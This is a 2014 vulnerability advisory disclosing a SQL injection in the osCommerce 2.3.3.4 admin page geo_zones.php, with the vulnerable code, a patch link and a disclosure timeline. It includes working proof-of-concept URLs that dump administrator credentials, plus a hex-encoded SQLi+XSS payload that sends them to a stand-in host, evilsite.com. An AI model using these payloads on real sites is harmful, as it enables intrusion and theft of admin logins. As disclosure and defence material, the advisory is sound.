osCommerce 2.3.3.4 SQL Injection

2014.02.07
Credit: Ahmed Aboul-Ela
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: Powered by osCommerce

# Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek # Vendor : http://www.oscommerce.com # Version: v2.3.3.4 (current latest release) and prior versions should be affected too # References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability - Vulnerable Code snippet in "catalog/admin/geo_zones.php": <?php [...] LINE 138: $rows = 0; LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified, a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id"; LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows); LINE 141: $zones_query = tep_db_query($zones_query_raw); [...] ?> As we can see at line 139 the GET zID parameter directly concatenated with the sql query without any type of sanitization which leads directly to sql injection vulnerability - Proof of Concept ( dump the admin username and password ): http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators -- - Exploitation & Attack Scenario: an authenticated admin account is required to successfully exploit the vulnerability but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]" We can use hybrid attack technique ( SQL Injection + XSS ) : http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators -- - Mitigation: The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902 - Time-Line: Mon, Feb 3, 2014 at 10:17 PM: vulnerability advisory sent to osCommerce Tue, Feb 4, 2014 at 01:14 AM: recevied initial reply from osCommerce Tue, Feb 4, 2014 at 02:06 AM: osCommerce released a quick fix for the vulnerability Thu, Feb 6, 2014 at 05:15 PM: the public responsible disclosure - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware

References:

https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top